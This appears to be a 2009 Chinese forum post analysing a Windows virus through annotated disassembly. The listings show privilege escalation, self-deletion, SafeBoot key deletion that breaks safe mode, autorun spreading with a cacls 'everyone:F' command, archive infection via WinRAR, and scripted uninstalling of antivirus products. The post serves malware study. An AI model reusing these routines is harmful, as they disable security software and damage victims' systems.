作 者: playboysen
时 间: 2009-02-06,08:11
链 接: http://bbs.pediy.com/showthread.php?t=81460
提权:
代码:
seg001:00406394 AdjustPrivilege proc near seg001:00406394 seg001:00406394 push ebx seg001:00406395 add esp, 0FFFFFFD0h seg001:00406398 lea eax, [esp+30h+TokenHandle] seg001:0040639C push eax ; TokenHandle seg001:0040639D push 20h ; DesiredAccess seg001:0040639F call GetCurrentProcess seg001:0040639F seg001:004063A4 push eax ; ProcessHandle seg001:004063A5 call OpenProcessToken seg001:004063A5 seg001:004063AA lea eax, [esp+30h+Luid] seg001:004063AE push eax ; lpLuid seg001:004063AF push offset Name ; "SeDebugPrivilege" seg001:004063B4 push 0 ; lpSystemName seg001:004063B6 call LookupPrivilegeValueA seg001:004063B6 seg001:004063BB mov eax, [esp+30h+Luid.LowPart] seg001:004063BF mov [esp+30h+NewState.Privileges.Luid.LowPart], eax seg001:004063C3 mov eax, [esp+30h+Luid.HighPart] seg001:004063C7 mov [esp+30h+NewState.Privileges.Luid.HighPart], eax seg001:004063CB mov [esp+30h+NewState.PrivilegeCount], 1 seg001:004063D3 xor ebx, ebx seg001:004063D5 mov [esp+30h+NewState.Privileges.Attributes], ebx seg001:004063D9 push esp ; ReturnLength seg001:004063DA lea eax, [esp+34h+PreviousState] seg001:004063DE push eax ; PreviousState seg001:004063DF push 10h ; BufferLength seg001:004063E1 lea eax, [esp+3Ch+NewState] seg001:004063E5 push eax ; NewState seg001:004063E6 push 0 ; DisableAllPrivileges seg001:004063E8 mov eax, [esp+44h+TokenHandle] seg001:004063EC push eax ; TokenHandle seg001:004063ED call AdjustTokenPrivileges seg001:004063ED seg001:004063F2 mov eax, [esp+30h+Luid.LowPart] seg001:004063F6 mov [esp+30h+PreviousState.Privileges.Luid.LowPart], eax seg001:004063FA mov eax, [esp+30h+Luid.HighPart] seg001:004063FE mov [esp+30h+PreviousState.Privileges.Luid.HighPart], eax seg001:00406402 mov [esp+30h+PreviousState.PrivilegeCount], 1 seg001:0040640A or ebx, 2 seg001:0040640D mov [esp+30h+PreviousState.Privileges.Attributes], ebx seg001:00406411 push esp ; ReturnLength seg001:00406412 push 0 ; PreviousState seg001:00406414 mov eax, [esp+38h+BufferLength] seg001:00406418 push eax ; BufferLength seg001:00406419 lea eax, [esp+3Ch+PreviousState] seg001:0040641D push eax ; NewState seg001:0040641E push 0 ; DisableAllPrivileges seg001:00406420 mov eax, [esp+44h+TokenHandle] seg001:00406424 push eax ; TokenHandle seg001:00406425 call AdjustTokenPrivileges seg001:00406425 seg001:0040642A add esp, 30h seg001:0040642D pop ebx seg001:0040642E retn seg001:0040642E seg001:0040642E AdjustPrivilege endp
代码:
seg001:00406598 RegisterService proc near seg001:00406598 seg001:00406598 add esp, 0FFFFFF6Ch seg001:0040659E mov [esp+94h+var_94], 94h seg001:004065A5 push esp ; lpVersionInformation seg001:004065A6 call GetVersionExA seg001:004065A6 seg001:004065AB cmp eax, 1 seg001:004065AE sbb eax, eax seg001:004065B0 inc eax seg001:004065B1 cmp al, 1 seg001:004065B3 jnz short loc_4065FE seg001:004065B3 seg001:004065B5 cmp [esp+94h+var_84], 2 seg001:004065BA jz short loc_4065FE seg001:004065BA seg001:004065BC push offset s_Kernel32_dll ; "kernel32.dll" seg001:004065C1 call LoadLibraryA seg001:004065C1 seg001:004065C6 mov hModule, eax seg001:004065CB cmp hModule, 0 seg001:004065D2 jz short loc_4065FE seg001:004065D2 seg001:004065D4 push offset s_Registerservi ; "RegisterServiceProcess" seg001:004065D9 mov eax, hModule seg001:004065DE push eax ; hModule seg001:004065DF call GetProcAddress seg001:004065DF seg001:004065E4 mov addr_RegisterServiceProcess, eax seg001:004065E9 push 1 seg001:004065EB push 0 seg001:004065ED call addr_RegisterServiceProcess seg001:004065F3 mov eax, hModule seg001:004065F8 push eax ; hLibModule seg001:004065F9 call FreeLibrary_0 ; "kernel32.dll" seg001:004065F9 seg001:004065FE loc_4065FE: seg001:004065FE add esp, 94h seg001:00406604 retn seg001:00406604 seg001:00406604 RegisterService endp
代码:
seg001:00406A70 del_self proc near seg001:00406A70 seg001:00406A70 push ebp seg001:00406A71 mov ebp, esp seg001:00406A73 add esp, 0FFFFFEECh seg001:00406A79 xor eax, eax seg001:00406A7B mov [ebp+var_10C], eax seg001:00406A81 mov [ebp+var_110], eax seg001:00406A87 mov [ebp+var_114], eax seg001:00406A8D xor eax, eax seg001:00406A8F push ebp seg001:00406A90 push offset sub_406B2B seg001:00406A95 push dword ptr fs:[eax] seg001:00406A98 mov fs:[eax], esp seg001:00406A9B push 104h ; nSize seg001:00406AA0 lea eax, [ebp+Buffer] seg001:00406AA6 push eax ; lpBuffer seg001:00406AA7 push offset s_Comspec ; "Comspec" seg001:00406AAC call GetEnvironmentVariableA ; 获取环境变量,查找cmd.exe文件路径 seg001:00406AAC seg001:00406AB1 push 0 seg001:00406AB3 lea eax, [ebp+var_110] seg001:00406AB9 lea edx, [ebp+Buffer] seg001:00406ABF mov ecx, 105h seg001:00406AC4 call sub_403D34 seg001:00406AC4 seg001:00406AC9 push [ebp+var_110] seg001:00406ACF push offset s_CDel ; " /c del \"" seg001:00406AD4 lea edx, [ebp+var_114] seg001:00406ADA xor eax, eax seg001:00406ADC call sub_402708 ; GetModuleFileNameA获取***文件路径 seg001:00406ADC seg001:00406AE1 push [ebp+var_114] seg001:00406AE7 push offset dword_406B5C ; uCmdShow seg001:00406AEC lea eax, [ebp+var_10C] seg001:00406AF2 mov edx, 4 seg001:00406AF7 call sub_403E0C seg001:00406AF7 seg001:00406AFC mov eax, [ebp+var_10C] seg001:00406B02 call sub_403F4C seg001:00406B02 seg001:00406B07 push eax ; lpCmdLine seg001:00406B08 call WinExec ; 即 “cmd.exe /c del ***本身路径” seg001:00406B08 seg001:00406B0D xor eax, eax seg001:00406B0F pop edx seg001:00406B10 pop ecx seg001:00406B11 pop ecx seg001:00406B12 mov fs:[eax], edx seg001:00406B15 push offset loc_406B32 seg001:00406B15 seg001:00406B1A loc_406B1A: seg001:00406B1A lea eax, [ebp+var_114] seg001:00406B20 mov edx, 3 seg001:00406B25 call sub_403BEC seg001:00406B25 seg001:00406B2A retn
代码:
seg001:00409138 mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts" seg001:0040913D call sub_403D54 seg001:0040913D seg001:00409142 mov eax, [ebp-0ACh] seg001:00409148 call FindFile_AdjustFileTime ; 查找文件,若找到就修正文件时间(FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime) seg001:00409148 seg001:0040914D cmp al, 1 seg001:0040914F jnz short loc_409194 seg001:0040914F seg001:00409151 lea eax, [ebp-0B4h] seg001:00409157 call GetSystemDirectory seg001:00409157 seg001:0040915C lea eax, [ebp-0B4h] seg001:00409162 mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts" seg001:00409167 call sub_403D54 seg001:00409167 seg001:0040916C mov eax, [ebp-0B4h] seg001:00409172 call sub_403F4C seg001:00409172 seg001:00409177 mov edx, eax seg001:00409179 lea eax, [ebp-0B0h] seg001:0040917F call sub_403CF8 seg001:0040917F seg001:00409184 mov eax, [ebp-0B0h] seg001:0040918A mov edx, 10h seg001:0040918F call sub_4066AC ; CreateFileA以独占方式打开文件,防修改 seg001:0040918F seg001:00409194 seg001:00409194 loc_409194: ; CODE XREF: seg001:0040914Fj seg001:00409194 lea eax, [ebp-0B8h] seg001:0040919A call sub_406DEC seg001:0040919A seg001:0040919F lea eax, [ebp-0B8h] seg001:004091A5 mov edx, offset s_Boot_ini ; "boot.ini" seg001:004091AA call sub_403D54 seg001:004091AA seg001:004091AF mov eax, [ebp-0B8h] seg001:004091B5 call FindFile_AdjustFileTime ; 查找文件,若找到就修正文件时间(FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime) seg001:004091B5 seg001:004091BA cmp al, 1 seg001:004091BC jnz short loc_409201 seg001:004091BC seg001:004091BE lea eax, [ebp-0C0h] seg001:004091C4 call sub_406DEC seg001:004091C4 seg001:004091C9 lea eax, [ebp-0C0h] seg001:004091CF mov edx, offset s_Boot_ini ; "boot.ini" seg001:004091D4 call sub_403D54 seg001:004091D4 seg001:004091D9 mov eax, [ebp-0C0h] seg001:004091DF call sub_403F4C seg001:004091DF seg001:004091E4 mov edx, eax seg001:004091E6 lea eax, [ebp-0BCh] seg001:004091EC call sub_403CF8 seg001:004091EC seg001:004091F1 mov eax, [ebp-0BCh] seg001:004091F7 mov edx, 10h seg001:004091FC call sub_4066AC ; 独占方式打开文件,防修改
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
代码:
seg001:0040C6FF Del_Key: seg001:0040C6FF mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}" seg001:0040C704 mov edx, offset s_SystemCurre_5 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... seg001:0040C709 mov eax, 80000002h seg001:0040C70E call near ptr s_L_LxRulBSvw3I+0Ah seg001:0040C70E seg001:0040C713 cmp al, 1 seg001:0040C715 jnz short loc_40C726 seg001:0040C715 seg001:0040C717 mov edx, offset s_SystemCurre_6 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... seg001:0040C71C mov eax, 80000002h seg001:0040C721 call RegDeleteKey ; 删除相关键值 seg001:0040C721 seg001:0040C726 Del_Key: seg001:0040C726 mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}" seg001:0040C72B mov edx, offset s_SystemCurre_7 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... seg001:0040C730 mov eax, 80000002h seg001:0040C735 call near ptr s_L_LxRulBSvw3I+0Ah seg001:0040C735 seg001:0040C73A cmp al, 1 seg001:0040C73C jnz short loc_40C74D seg001:0040C73C seg001:0040C73E mov edx, offset s_SystemCurre_8 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... seg001:0040C743 mov eax, 80000002h seg001:0040C748 call RegDeleteKey
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
代码:
seg001:0040C76C mov edx, offset s_SoftwareMic_7 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ seg001:0040C771 mov eax, 80000002h seg001:0040C776 call near ptr s_L_LxRulBSvw3I+0Ah seg001:0040C776 seg001:0040C77B cmp al, 1 seg001:0040C77D jnz short loc_40C7AA seg001:0040C77D seg001:0040C77F push offset s_SoftwareMic_8 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ seg001:0040C784 mov eax, off_41356C seg001:0040C789 push dword ptr [eax] seg001:0040C78B push offset dword_40C884 seg001:0040C790 lea eax, [ebp+var_80] seg001:0040C793 mov edx, 3 seg001:0040C798 call sub_403E0C seg001:0040C798 seg001:0040C79D mov edx, [ebp+var_80] seg001:0040C7A0 mov eax, 80000002h seg001:0040C7A5 call RegDeleteKey
代码:
seg001:0040A080 push edi ; phkResult seg001:0040A081 push offset s_SystemContr_1 ; SYSTEM\ControlSet001\Control\StorageDevicePolicies seg001:0040A086 push 80000002h ; hKey seg001:0040A08B call RegOpenKeyA seg001:0040A08B seg001:0040A090 push 4 ; cbData seg001:0040A092 lea eax, [ebp+Data] seg001:0040A095 push eax ; lpData seg001:0040A096 push 4 ; dwType seg001:0040A098 push 0 ; Reserved seg001:0040A09A push offset s_Writeprotect ; "WriteProtect" seg001:0040A09F mov eax, [edi] seg001:0040A0A1 push eax ; hKey seg001:0040A0A2 call RegSetValueExA seg001:0040A0A2 seg001:0040A0A7 mov eax, [edi] seg001:0040A0A9 push eax ; hKey seg001:0040A0AA call RegCloseKey_0 seg001:0040A0AA seg001:0040A0AF xor eax, eax seg001:0040A0B1 mov dword ptr [ebp+Data], eax seg001:0040A0B4 push edi ; phkResult seg001:0040A0B5 push offset s_SoftwareMic_4 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced seg001:0040A0BA push 80000001h ; hKey seg001:0040A0BF call RegOpenKeyA seg001:0040A0BF seg001:0040A0C4 push 4 ; cbData seg001:0040A0C6 lea eax, [ebp+Data] seg001:0040A0C9 push eax ; lpData seg001:0040A0CA push 4 ; dwType seg001:0040A0CC push 0 ; Reserved seg001:0040A0CE push offset s_Showsuperhidd ; "ShowSuperHidden" seg001:0040A0D3 mov eax, [edi] seg001:0040A0D5 push eax ; hKey seg001:0040A0D6 call RegSetValueExA seg001:0040A0D6 seg001:0040A0DB mov eax, [edi] seg001:0040A0DD push eax ; hKey seg001:0040A0DE call RegCloseKey_0 seg001:0040A0DE seg001:0040A0E3 mov dword ptr [ebp+Data], 91h seg001:0040A0EA push edi ; phkResult seg001:0040A0EB push offset s_SoftwareMic_5 ; SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer seg001:0040A0F0 push 80000002h ; hKey seg001:0040A0F5 call RegOpenKeyA seg001:0040A0F5 seg001:0040A0FA push 4 ; cbData seg001:0040A0FC lea eax, [ebp+Data] seg001:0040A0FF push eax ; lpData seg001:0040A100 push 4 ; dwType seg001:0040A102 push 0 ; Reserved seg001:0040A104 push offset s_Nodrivetypeau ; "NoDriveTypeAutoRun" seg001:0040A109 mov eax, [edi] seg001:0040A10B push eax ; hKey seg001:0040A10C call RegSetValueExA seg001:0040A10C seg001:0040A111 mov eax, [edi] seg001:0040A113 push eax ; hKey seg001:0040A114 call RegCloseKey_0 ......
在Windows 2000/XP/Server 2003里面,软件厂商在碰到文件被占用无法马上替换或者删除问题的时候,都会使用MoveFileEx API函数让系统在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager Value:PendingFileRenameOperations键值下面建立一个延迟删除列表,系统在下次启动的时候,CSRSS.EXE进程将根据这个列表对文件进行延迟更新或者延迟删除操作。
PendingFileRenameOperations是一个REG_MULTI_SZ类型的注册表键值,不能直接通过注册表编辑器编辑,否则会造成延迟删除列表被破坏。要查看这个键值的内容,可以使用注册表编辑器或者专用注册表操作工具。Windows XP在安装完需要重启的补丁以后就是利用PendingFileRenameOperations控制被占用文件进行被占用文件的升级和删除操作的。
代码:
seg001:00409CF3 mov ecx, offset s_Pendingfilere ; "PendingFileRenameOperations" seg001:00409CF8 mov edx, offset s_SystemCurrent ; SYSTEM\CurrentControlSet\Control\Session Manager seg001:00409CFD mov eax, 80000002h seg001:00409D02 call sub_408150 seg001:00409D02 ...... seg001:00409DF9 push 4 ; dwFlags seg001:00409DFB push 0 ; lpNewFileName seg001:00409DFD lea eax, [ebp+var_28C] seg001:00409E03 call GetSystemDirectory seg001:00409E03 seg001:00409E08 lea eax, [ebp+var_28C] seg001:00409E0E mov edx, offset s_Ravext_dll ; "RavExt.dll" seg001:00409E13 call sub_403D54 seg001:00409E13 seg001:00409E18 mov eax, [ebp+var_28C] seg001:00409E1E call sub_403F4C seg001:00409E1E seg001:00409E23 push eax ; lpExistingFileName seg001:00409E24 call MoveFileExA seg001:00409E24 seg001:00409E29 push 4 ; dwFlags seg001:00409E2B push 0 ; lpNewFileName seg001:00409E2D lea eax, [ebp+var_290] seg001:00409E33 call GetSystemDirectory seg001:00409E33 seg001:00409E38 lea eax, [ebp+var_290] seg001:00409E3E mov edx, offset s_Bsmain_exe ; "bsmain.exe" seg001:00409E43 call sub_403D54 seg001:00409E43 seg001:00409E48 mov eax, [ebp+var_290] seg001:00409E4E call sub_403F4C seg001:00409E4E seg001:00409E53 push eax ; lpExistingFileName seg001:00409E54 call MoveFileExA
使用命令行工具cacls.exe来提高everyone用户对文件autorun.inf的控制权限
CACLS filename [/T] [/E] [/C] [/G user:perm]
显示或者修改文件的访问控制表(ACL)
filename 显示 ACL。
/T 更改当前目录及其所有子目录中指定文件的 ACL。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
代码:
seg001:0040D15D mov eax, [ebp+var_4] seg001:0040D160 call GetVolumeInformation seg001:0040D160 seg001:0040D165 mov eax, [ebp+var_27C] seg001:0040D16B mov edx, offset s_Ntfs ; "NTFS" seg001:0040D170 call sub_403E98 seg001:0040D170 seg001:0040D175 jnz short loc_40D1B1 seg001:0040D175 seg001:0040D177 push 0 seg001:0040D179 push offset s_CmdCEchoYCacl ; "cmd /c echo Y| cacls " seg001:0040D17E push [ebp+var_4] seg001:0040D181 push offset s_Autorun_infTG ; "autorun.inf /t /g everyone:F" seg001:0040D186 lea eax, [ebp+var_280]
代码:
seg001:0040DAB4 KillDuBa proc near ; DATA XREF: start+1126o seg001:0040DAB4 push ebx seg001:0040DAB5 push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序" seg001:0040DABA push offset s_32770_1 ; "#32770" seg001:0040DABF call FindWindowA seg001:0040DABF seg001:0040DAC4 mov ebx, eax seg001:0040DAC6 push offset s_N> ; "下一步(&N) >" seg001:0040DACB push offset s_Button_0 ; "Button" seg001:0040DAD0 push 0 ; HWND seg001:0040DAD2 push ebx ; HWND seg001:0040DAD3 call FindWindowExA seg001:0040DAD3 seg001:0040DAD8 mov ebx, eax seg001:0040DADA push 0 ; lParam seg001:0040DADC push 0 ; wParam seg001:0040DADE push 0F5h ; Msg seg001:0040DAE3 push ebx ; hWnd seg001:0040DAE4 call SendMessageA seg001:0040DAE4 seg001:0040DAE9 push 0 ; lParam seg001:0040DAEB push 0 ; wParam seg001:0040DAED push 0F5h ; Msg seg001:0040DAF2 push ebx ; hWnd seg001:0040DAF3 call SendMessageA seg001:0040DAF3 seg001:0040DAF8 push 320h ; dwMilliseconds seg001:0040DAFD call Sleep seg001:0040DAFD seg001:0040DB02 push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序" seg001:0040DB07 push offset s_32770_1 ; "#32770" seg001:0040DB0C call FindWindowA seg001:0040DB0C seg001:0040DB11 mov ebx, eax seg001:0040DB13 push offset s_U ; "卸载(&U)" seg001:0040DB18 push offset s_Button_0 ; "Button" seg001:0040DB1D push 0 ; HWND seg001:0040DB1F push ebx ; HWND seg001:0040DB20 call FindWindowExA seg001:0040DB20 seg001:0040DB25 mov ebx, eax seg001:0040DB27 push 0 ; lParam seg001:0040DB29 push 0 ; wParam seg001:0040DB2B push 0F5h ; Msg seg001:0040DB30 push ebx ; hWnd seg001:0040DB31 call SendMessageA seg001:0040DB31 seg001:0040DB36 push 0 ; lParam seg001:0040DB38 push 0 ; wParam seg001:0040DB3A push 0F5h ; Msg seg001:0040DB3F push ebx ; hWnd seg001:0040DB40 call SendMessageA seg001:0040DB40 seg001:0040DB45 push 0BB8h ; dwMilliseconds seg001:0040DB4A call Sleep seg001:0040DB4A seg001:0040DB4F push 0 ; lpWindowName seg001:0040DB51 push offset s_Ieframe_0 ; "IEFrame" seg001:0040DB56 call FindWindowA seg001:0040DB56 seg001:0040DB5B mov ebx, eax seg001:0040DB5D push 1 ; lParam seg001:0040DB5F push 0F060h ; wParam seg001:0040DB64 push 112h ; Msg seg001:0040DB69 push ebx ; hWnd seg001:0040DB6A call SendMessageA seg001:0040DB6A seg001:0040DB6F pop ebx seg001:0040DB70 retn seg001:0040DB70 seg001:0040DB70 KillDuBa endp
命令行模式:
A ——添加文件到压缩包
-ep ——添加文件时不包含路径信息
-u ——更新文件
-inul ——禁止错误提示信息
代码:
seg001:0040F7E6 push 0 seg001:0040F7E8 push dword_4149D4 seg001:0040F7EE push offset s_Winrar_exeA-e ; "\\WinRAR.exe a -ep -u -inul " seg001:0040F7F3 push dword_4149D0 seg001:0040F7F9 push offset dword_40FF5C seg001:0040F7FE push [ebp+uCmdShow] ; uCmdShow seg001:0040F801 lea eax, [ebp+var_1F4] seg001:0040F807 mov edx, 5 seg001:0040F80C call sub_403E0C seg001:0040F80C seg001:0040F811 mov eax, [ebp+var_1F4] seg001:0040F817 call sub_403F4C seg001:0040F817 seg001:0040F81C push eax ; lpCmdLine seg001:0040F81D call WinExec
代码:
seg001:0041129F mov eax, offset s_Ravmon_exe ; "RavMon.exe" seg001:004112A4 call sub_4076E8 seg001:004112A4 seg001:004112A9 cmp al, 1 seg001:004112AB jnz loc_411387 seg001:004112AB seg001:004112B1 lea eax, [ebp+var_1D0] seg001:004112B7 push eax seg001:004112B8 mov ecx, offset s_Installpath ; "installpath" seg001:004112BD mov edx, offset s_SoftwareRisin ; "SOFTWARE\\rising\\Rav" seg001:004112C2 mov eax, 80000002h seg001:004112C7 call RegQueryValue ...... seg001:004112D7 seg001:004112DC push 0 ; dwExtraInfo seg001:004112DE push 0 ; dwFlags seg001:004112E0 push 0 ; uMapType seg001:004112E2 push 5Bh ; uCode 5Bh微软左徽标键 seg001:004112E4 call MapVirtualKeyA seg001:004112E4 seg001:004112E9 push eax ; bScan seg001:004112EA push 5Bh ; bVk seg001:004112EC call keybd_event seg001:004112EC seg001:004112F1 push 0 ; dwExtraInfo seg001:004112F3 push 0 ; dwFlags seg001:004112F5 push 0 ; uMapType seg001:004112F7 push 4Dh ; uCode 4Dh是"M" seg001:004112F9 call MapVirtualKeyA ...... seg001:0041132B seg001:00411330 push 1 ; uCmdShow seg001:00411332 mov edx, off_413554 seg001:00411338 mov edx, [edx] seg001:0041133A lea eax, [ebp+var_1D4] seg001:00411340 mov ecx, offset s_UpdateSetup_e ; "\\Update\\setup.exe" seg001:00411345 call sub_403D98 seg001:00411345 seg001:0041134A mov eax, [ebp+var_1D4] seg001:00411350 call sub_403F4C seg001:00411350 seg001:00411355 push eax ; lpCmdLine seg001:00411356 call WinExec seg001:00411356 seg001:0041135B push 5DCh ; dwMilliseconds seg001:00411360 call Sleep seg001:00411360 seg001:00411365 mov eax, lpThreadId seg001:0041136A push eax ; lpThreadId seg001:0041136B push 0 ; dwCreationFlags seg001:0041136D push 0 ; lpParameter seg001:0041136F push offset sub_40DBC8 ; lpStartAddress seg001:00411374 push 0 ; dwStackSize seg001:00411376 push 0 ; lpThreadAttributes seg001:00411378 call CreateThread seg001:00411378 seg001:0041137D push 0DACh ; dwMilliseconds seg001:00411382 call Sleep seg001:00411382 seg001:00411387 seg001:00411387 loc_411387: ; CODE XREF: start+E47j seg001:00411387 mov eax, offset s_Avp_exe ; "avp.exe" seg001:0041138C call sub_4076E8 seg001:0041138C seg001:00411391 cmp al, 1 seg001:00411393 jnz uninstall ......